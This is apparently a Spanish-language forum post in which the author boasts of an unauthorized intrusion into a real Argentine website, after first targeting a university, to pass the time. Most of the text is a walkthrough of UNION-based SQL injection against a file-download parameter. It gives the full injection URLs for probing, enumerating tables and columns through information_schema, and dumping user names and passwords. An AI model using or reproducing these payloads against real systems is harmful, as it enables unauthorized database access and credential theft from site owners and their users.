Que Scanners ni Scanners.. toma esta...

Bien... estaba muy aburrido , jugar al CS no da , por que todos la estan chiteando y bue.. no da
asi que agarre y pense... voy a ownear algo ? si si decia por dentro , no sabia como empezar... y pense en una universidad , asi que agarre y pense en una (UTN , si encontre algo pero no funca la pass :( ) xD..
bue despues me fui a otra... y como no uso scanners , aveces solo para listar directorios uso acunetix.. pero no mucho mas
asi que agarre y me fui a google
y meti un

filetype:php site:web.com.ar (no es este el dominio)

bueno buscando y buscando , la verdad no encontraba un sorete... que hdp u.u
asi que habia descarga de unos archivos .pdfs y recorde un tutorial que habia leido hace tiempo y dije... y si probamos :P

la injeccion es:

http://web.com.ar/path/descargar_archivo.php?id=8

donde vemos que nos descarga el archivo original...
asi que si probamos con un +and+1=1--
me descargaba el pdf original...pero si probamos con un
+and+1=0--
me daba para descargar un archivo en php...
el cual obviamente estaba vacio 8-)asi que meti un union
asi

http://web.com.ar/path/descargar_archivo.php?id=8+and+1=0+union+select+0--

donde no tiro nada...asi que fue a buscar mas valores.. order by .. no me gusta usarlo xD
hast que me dio...

http://web.com.ar/path/descargar_archivo.php?id=8+and+1=0+union+select+0,1,2--

dodne me descargaba un archivo llamado 2
omg :Pasi que como siempre... me fui a fijar la version aver si existina information_schema
y si.. como es una version 5.*.. ya estaba echo :P

http://web.com.ar/path/descargar_archivo.php?id=8+and+1=0+union+select+0,1,version()--

ahora es cosa de concatear las tablas.. asi que para hacerlo mas rapido hise

http://web.com.ar/path/descargar_archivo.php?id=8+and+1=0+union+select+0,1,group_concat(table_name)
+from+information_schema.tables--

donde me devolvio...

pero el problema era que el archivo se llamaba asi.. al tratar de guardarlo con ese nombre
NO me dejaba.. y pense que estaba en el horno xD
y bueno.. como no kedo otra lo descargue...donde guardarlo como asdasd.txt .. y ver el contenido era 1
eaa eaa.. para ver las tablas en el .txt solo era cosa de cambiar la injeccion...
de

http://web.com.ar/path/descargar_archivo.php?id=8+and+1=0+union+select+0,1,group_concat(table_name)
+from+information_schema.tables--

por

http://web.com.ar/path/descargar_archivo.php?id=8+and+1=0+union+select+0,group_concat(table_name),2
+from+information_schema.tables--

se entiende creo 8-)....
asi que le damos.. lo que me devolvio
al ver el contenido del .txt..
asi que era cosa de buscar una tabla donde pudiera tener acceso a la adminsitracion de la web...
y existia entre otras la tabla
usuarios
asi que la pase a usuarios a ascii llendo a este traductor que siempre uso...asi que es cosa de concatear las columas de la tabla usuarios
kedando la injection asi:

http://web.com.ar/path/descargar_archivo.php?id=8+and+1=0+union+select+0,group_concat(column_name),2
+from+information_schema.columns+where+table_name=char(117,115,117,97,114,105,111)--

donde ahora nos viene la parte mas bonita :P
la injeccion seria

http://web.com.ar/path/descargar_archivo.php?id=8+and+1=0+union+select
+0,group_concat(id_usuario,0x3a,nombre,0x3a,apeelido,0x3a,clave,0x3c62723e),2
+from+usuario--

donde 0x3c62723e es un
.. pasado a hexa.. por que si la injection fuera devuelta sobre la web , generaria un salto de linea y seria mas comodo identificar usuarios...
como aca descargo el archivo de texto (.txt).. tambien me mostro donde comenzaba y terminaba un usuario...
ahora seria cosa... llamar a un par de gatos , de ir al video club alquilarse emanuelle 4
y el resto se sabe 8-)
saabeeeeeeeeeeeeeeeeeeeeeeeeeee
By me
jake yo ;$
jajajajjaa xD
saludos